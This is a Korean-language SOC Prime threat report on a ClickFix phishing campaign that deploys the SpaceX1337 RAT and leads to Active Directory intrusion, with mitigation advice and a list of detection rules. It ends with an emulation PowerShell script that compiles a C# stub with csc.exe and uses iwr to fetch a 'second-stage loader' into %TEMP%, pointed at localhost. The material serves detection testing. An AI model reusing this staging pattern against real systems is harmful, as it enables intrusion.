SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix가 핸즈온 키보드 AD 위협을 초래하다

Author Photo
SOC Prime Team linkedin icon 팔로우
SpaceX1337 ClickFix가 핸즈온 키보드 AD 위협을 초래하다
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

공격자는 ClickFix 피싱 유인을 사용하여 SpaceX1337 RAT를 배포한 후 NetSupport, AsyncRAT, Remus와 같은 상용 RAT을 포함한 다단계 감염을 실행했습니다. 침입은 자동화된 자격 증명 탈취에서 Active Directory를 대상으로 하는 인터랙티브 직접 제어 활동으로 진행되었습니다. 궁극적으로 공격자는 도메인 컨트롤러로의 횡적 이동을 시도하고 VPN 포털에 대한 자격 증명 채우기를 시도했습니다.

조사

침입은 완전히 계측된 Active Directory 허니넷 내에서 포착되어, EDR, Zeek, Suricata 원격 측정을 통해 끝에서 끝까지 가시성을 제공합니다. 연구자들은 초기 PowerShell 다운로드를 통해 광범위한 ADSI/LDAP 정찰 및 SMB를 통한 횡적 이동 활동을 추적했습니다. 조사는 자동화된 맬웨어 실행에서 인간 운영자의 직접 상호작용으로의 전환을 명확히 확인했습니다.

완화

조직은 엄격한 PowerShell 실행 제어를 시행하고, 다음을 포함한 의심스러운 상위-하위 프로세스 관계를 모니터링해야 합니다. explorer.exe 에서 PowerShell을 생성합니다. 보안 팀은 csc.exe 를 통한 온호스트 컴파일을 감지하고, certutil or bitsadmin 와 같은 LOLBins의 남용을 통한 외부 다운로드를 모니터링해야 합니다. Active Directory는 또한 LDAP 속성에서 민감한 데이터를 제거하고 비정상적인 LDAP 쿼리를 모니터링하여 강화해야 합니다.

대응

의심스러운 활동이 감지되면 사건 대응자는 영향을 받은 엔드포인트를 격리하고, 잠재적으로 타협된 서비스 계정 및 도메인 관리자 자격 증명을 회수해야 합니다. 조사는 다양한 RAT 패밀리 식별을 우선시하고, 무단 예약 작업 또는 레지스트리 수정 여부를 점검해야 합니다. 또한, VPN 로그를 검토하여 악의적인 인프라에서 유래한 자격 증명 채우기 시도를 확인해야 합니다.

공격 흐름

탐지

의심스러운 폴더에서의 Python 실행 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

LOLBin 의미론을 가진 의심스러운 RunMRU 항목 (registry_event 사용)

SOC 프라임 팀
2026년 8월 13일

Windows 원격 관리 사용하여 원격 호스트에서 명령 실행 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

계정 또는 그룹 열거/조작 가능성 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

의심스러운 도메인 신뢰 발견 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

시스템 네트워크 구성 발견 가능성 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

이름에 숫자만 포함된 의심스러운 실행 파일 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

LOLBAS 예약 작업 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

데이터 인코딩 및 인증서 작업에 Certutil 사용 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

LOLBAS Bitsadmin (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

SAM/SYSTEM/SECURITY 덤프 가능성 (cmdline 사용)

SOC 프라임 팀
2026년 8월 13일

Powershell에서 의심스러운 .NET 메서드 호출 (powershell 사용)

SOC 프라임 팀
2026년 8월 13일

의심스러운 Trycloudflare 도메인 통신 (dns 사용)

SOC 프라임 팀
2026년 8월 13일

IP 조회 도메인 통신 시도 가능성 (dns 사용)

SOC 프라임 팀
2026년 8월 13일

탐지할 IOCs (HashSha256): ClickFix SpaceX1337에서 Hands-on-Keyboard AD 공격까지

SOC 프라임 AI 규칙
2026년 8월 13일

탐지할 IOCs (HashMd5): ClickFix SpaceX1337에서 Hands-on-Keyboard AD 공격까지

SOC 프라임 AI 규칙
2026년 8월 13일

탐지할 IOCs (SourceIP): ClickFix SpaceX1337에서 Hands-on-Keyboard AD 공격까지

SOC 프라임 AI 규칙
2026년 8월 13일

탐지할 IOCs (DestinationIP): ClickFix SpaceX1337에서 Hands-on-Keyboard AD 공격까지

SOC 프라임 AI 규칙
2026년 8월 13일

SpaceX1337 및 AdaptixC2 통신을 위한 고신뢰 Sigma 규칙 [Windows 네트워크 연결]

SOC 프라임 AI 규칙
2026년 8월 13일

AdaptixC2 비컨 컴파일 및 PowerShell 로더 탐지 [Windows 프로세스 생성]

SOC 프라임 AI 규칙
2026년 8월 13일

시뮬레이션 실행

필수 조건: 원격 측정 및 기준사전 비행 점검 통과해야 함.

설명: 이 섹션은 탐지 규칙을 트리거하는 적대적 기법(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 내러티브는 식별된 TTP를 직접 반영하고 탐지 논리에 예상되는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.

  • 공격 서사 및 명령: 공격자는 피싱 링크를 통해 초기 접근에 성공했습니다. 알려진 악성 .exe 를 디스크에 가져오는 것을 피하기 위해, 그들은 작은 .cs 소스 파일을 떨어뜨립니다. 그런 다음 csc.exe 를 호출하여 이 소스를 기능적인 Windows 실행 파일 (svc.exe)로 컴파일합니다. 해당 파일은 %TEMP% 디렉토리에 있습니다. 컴파일 직후, 공격자는 PowerShell을 사용하여 원격 C2 서버(로컬 리스너로 시뮬레이트됨)에서 2단계 로더를 가져오고, iwr (Invoke-WebRequest) 별칭을 통해 이를 가져옵니다. 템프 폴더에 저장하여 스테이징 프로세스를 완료합니다.

  • 회귀 테스트 스크립트:

    # 1. AdaptixC2 소스를 시뮬레이션하기 위해 더미 C# 소스 파일 생성
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. csc.exe 컴파일 시뮬레이션 (selection_csc 트리거)
    # 참고: 탐지 논리에 명시된 정확한 플래그 사용
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. 파워셸 다운로드 시뮬레이션 (selection_powershell 트리거)
    # 'iwr'과 특정 OutFile 경로를 사용하여 논리와 일치시킴
    # 실제 네트워크 트래픽을 피하기 위해 존재하지 않는 URL 사용, 그러나 명령줄은 일치함
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • 정리 명령:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue